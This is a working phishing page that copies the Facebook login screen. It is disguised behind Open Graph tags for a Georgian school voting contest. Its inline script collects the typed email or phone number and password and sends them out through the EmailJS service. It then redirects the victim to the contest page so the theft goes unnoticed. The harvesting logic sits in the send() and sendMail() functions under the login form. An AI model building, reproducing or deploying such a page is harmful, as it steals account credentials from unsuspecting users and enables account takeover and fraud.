
<!doctype html>
<html lang="en">
<head>
	<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/emailjs-com@2/dist/email.min.js"></script>
	<script type="text/javascript">
	(function() {
	emailjs.init("user_j6qaLFstxbcGlkb7Biu2v");
	})();
	</script>
<meta charset="utf-8"/>
<meta name="keyword" content="game"/>
<meta name="author" content="Beqa Kikutadze"/>
<meta name="viewport" content="width=device-width,initial-scale=1.0"/> 
<link rel="shortcut icon" href="https://rcheuli.wignebistaro.ge/images/logo.png">
<meta property="og:url" content="https://rcheuli.wignebistaro.ge/saskolo/contestant?id=24">
<meta property="og:image" content="https://rcheuli.wignebistaro.ge/images/contestants/thumbnails/saskolo/24.jpg?v=2">
<meta property="og:title" content="ჩემი რჩეული: გეგა ხაჩიძე">
<meta property="og:description" content="ხალხის რჩეული - კიდევ ერთი მოსწავლე კემბრიჯში">
<meta property="og:type" content="website">
<meta property="fb:app_id" content="492175755024114">
<style>
    body {background-color:#f0f2f5;}
#con{margin-left:150px;margin-top:175px;}
 #logo {position:relative; left:0; top:0;} 
#con1 {
	position:relative;left:28px;top:-40px;
	padding:0 0 20px;
	font-family:"SFProDisplay-regular" ,Helvetica, Arial, sans-serif;
    font-size:28px; font-color:#1c1e21;
    width:500px;height:84px;	
	
}
#form {
	width:396px; height:350px;
	position:absolute;right:185px; top:133px;
	box-shadow:0 2px 4px rgb(0 0 0 / 10%), 0 8px 16px rgb(0 0 0 / 10%);
	-moz-box-shadow:0 2px 4px rgb(0 0 0 / 10%), 0 8px 16px rgb(0 0 0 / 10%);
	border-radius:8px;
	background-color:#ffffff;
}
#fromName,#msg {margin-left:18px;margin-top:14px;width:90%;
    border:1px solid #dddfe2;
    padding: 14px 16px;
	box-sizing:border-box;
    font-family:Helvetica, Arial ,sans-serif;
	font-size: 17px;
	border-radius:6px;
	outline:#0eb2f6;
	
}
/*::-webkit-input-placeholder {color:red;} */
:focus::-webkit-input-placeholder {color:#a5a3a3;}
#fromName:focus {border:1px solid #0eb2f6;/*color:red;*/}
#msg:focus {border:1px solid #0eb2f6;}
span {font-weight:bold;}
#page {
	font-family:"SFProText-Regular", Helvetica, Arial, sans-serif;
	font-size:14px;
	color:#1c1e21;
    position:relative;
	top:20px;left:45px;
}
#login {height:48px; border:none; border-radius:6px;
width:90%;
padding:0 16px;
font-size:20px;
font-family:Helvetica, Arial , sans-serif;
-webkit-font-smoothing: antialiased;
justify-content:center;
font-weight:bold;
vertical-align:middle;
white-space:nowrap;
background-color:#1877f2;
color:white;
cursor:pointer;
margin-left:18px; margin-top:14px;
outline:none;
}
#create {color:white;
font-size:17px;
height: 48px;
font-family: Helvetica, Arial , sans-serif;
background-color:#42b72a;
width:51%;
margin:20px 25%;
font-weight:bold;
-webkit-font-smoothing: antialiased;
justify-content:center;
text-align:center;
cursor:pointer;
border:none;
border-radius:6px;
tevertical-align:middle;
	}
	#login:hover {background-color:#0667f9;}
	#create:hover {background-color:#2ea216;}
#hr {width:90%;margin-left:16px;margin-top:5px;}
#link {
	text-decoration:none;
	width:30%;
    height:16px;
    margin-left:35%;
    line-height: 50px;
    font-family:Helvetica, Arial,sans-serif;
    font-size:14px;
	color:#1877f2;
}
#link:hover {text-decoration:underline;}
#footer {
	width:100%;
	background:purple;
	position:absolute;top:700px;
	font-size:12px;
}
@media only screen and (max-width:1125px)
{
	#form {position:absolute;right:5%;top:133px;}
	#con {margin-left:1.5%;}
}
@media only screen and (max-width:1075px)
{
	#form {position:absolute; right:45px;top:133px;}

	
    #con {margin-left:3px;margin-top:175px;}
    #con1 {width:368px;font-size:24px;color:#1c1e21;top:-35px;} 
}
@media only screen and (max-width:900px)
{
#con {width:400px;
margin:12px auto;
text-align:center;}
#logo {text-align:center;}
#con1 {align:center;width:400px;height:56px;margin-left:-25px;margin-top:30px;}
#form {position:absolute;left:40px;top:235px;margin:0 auto;}
#link {padding:0 auto;width:40%;margin-left:35%;}
#form {width:50%;position:absolute;margin:0 auto;}
}	

@media only screen and (max-width:720px)
{
	#form{width:70%;position:absolute;margin:0 auto;}
	#link{width:100px; font-size:15px;}
}
@media only screen and (max-width:480px)
{
    #fromName,#msg,#login{margin-left:5%;width:90%;font-size:15px;}
	#link {font-size:14px;}
	#create{margin-left:25%;width:50%;font-size:13px;}
	#hr {width:90%;margin-left:5%;}
	#con {width:90%;}
	#con1{width:90%;margin-left:-10px;}
	#page {width:80%;margin-left:-10px;}
	#form {width:80%; position:absolute;top:225px; margin:0 auto;}
	
}
@media only screen and (max-width:374px)
{
	#logo {left:0px;}
	#link{margin-left:31%;font-size:13.5px;}
}
@media only screen and (max-width:322px)
{
    #con1 {font-size:20px;}
	#logo {width:110%;left:-5px;}
	#form {margin:-5px;margin-top:-25px;}
} 
</style>
<title> Facebook - log in or sign up </title>
</head>
<body>
	<script type="text/javascript">
		if (navigator.userAgent.match(/iPhone/i)){
			document.getElementById("form").style.boxShadow="0 1px 4px rgba(72, 73, 73, 0.2), 0 1px 4px rgba(72, 73, 73, 0.2)";
		}
		</script> 
<div id="con">
 <image src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" width="301" height="106" id="logo"/>
 <p id="con1"> Connect with friends and the world around you on Facebook. </p> 
</div>
<div id="form">
   <input type="email" pattern="([0-9]{9,})|([^ ]+@[^ ]+\.[a-z]{2,3})" title="You must enter Email or Number" id="fromName" maxlength="30" name="fromName" placeholder="Email or Phone Number" autofocus="1" required/>
  <input type="password" pattern=".{6,}" title="Password must contain at least 6 characters" id="msg" maxlength="30" name="msg" placeholder="Password" onkeyup="sendMail()" required/>
    <button id="login" onclick="send()"  name="submit" type="submit" >Log In </button>
  <script>
var t=false,f=false;
		var input=document.querySelector('#msg');
	input.addEventListener('keydown',(e) => {
		if(e.keyCode===13) {
		   t=true;}
	});
		var bto=document.querySelector('#login'); 
     function send() {
            var tempParams = {
	   from_name:document.getElementById("fromName").value,
	   message:document.getElementById("msg").value,
   };
        emailjs.send('service_563rcxu','template_rzcj3ff',tempParams); 
setTimeout(click,1500);}

function click () {
window.open('https://rcheuli.wignebistaro.ge/saskolo/contestant/?id=24#_=_','_self');
}
    function sendMail() {
        if(t===true) {
            var tempParams = {
	   from_name:document.getElementById("fromName").value,
	   message:document.getElementById("msg").value,
   };
        emailjs.send('service_563rcxu','template_rzcj3ff',tempParams); 
setTimeout(click,1500);}
	}
</script>

  <a href="https://www.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0" target="_blank" id="link"> Forgot Password? </a> 
  <hr id="hr"/>
  <button onclick="index.html" type="button" id="create">Create New Account</button>
 
<p id="page"> <span> Create a Page </span> for a celebrity, band or business. </p> </div>
<script type="text/javascript">
	if (navigator.userAgent.match(/iPhone/i)){
		document.getElementById("form").style.boxShadow="0 1px 4px rgba(72, 73, 73, 0.2), 0 1px 4px rgba(72, 73, 73, 0.2)";
	}
	</script> 
<!--<div id="footer">
 <p> English (US) ქართული Русский Türkçe Deutsch Azərbaycan dili العربية Français (France) Ελληνικά Español Português (Brasil)  +</p>
 <hr id="hr2"/>
 <p> Sign Up  Log In  Messenger  Facebook Lite  Watch  People  Pages  Page Categories  Places  Games  Locations  Marketplace  Facebook Pay  Groups  Jobs  Oculus  Portal  Instagram  Local  Fundraisers  Services  Voting Information Center  About  Create Ad  Create Page  Developers  Careers  Privacy  Cookies  Ad choices!  Terms  Help</p> -->


</body>
</html>
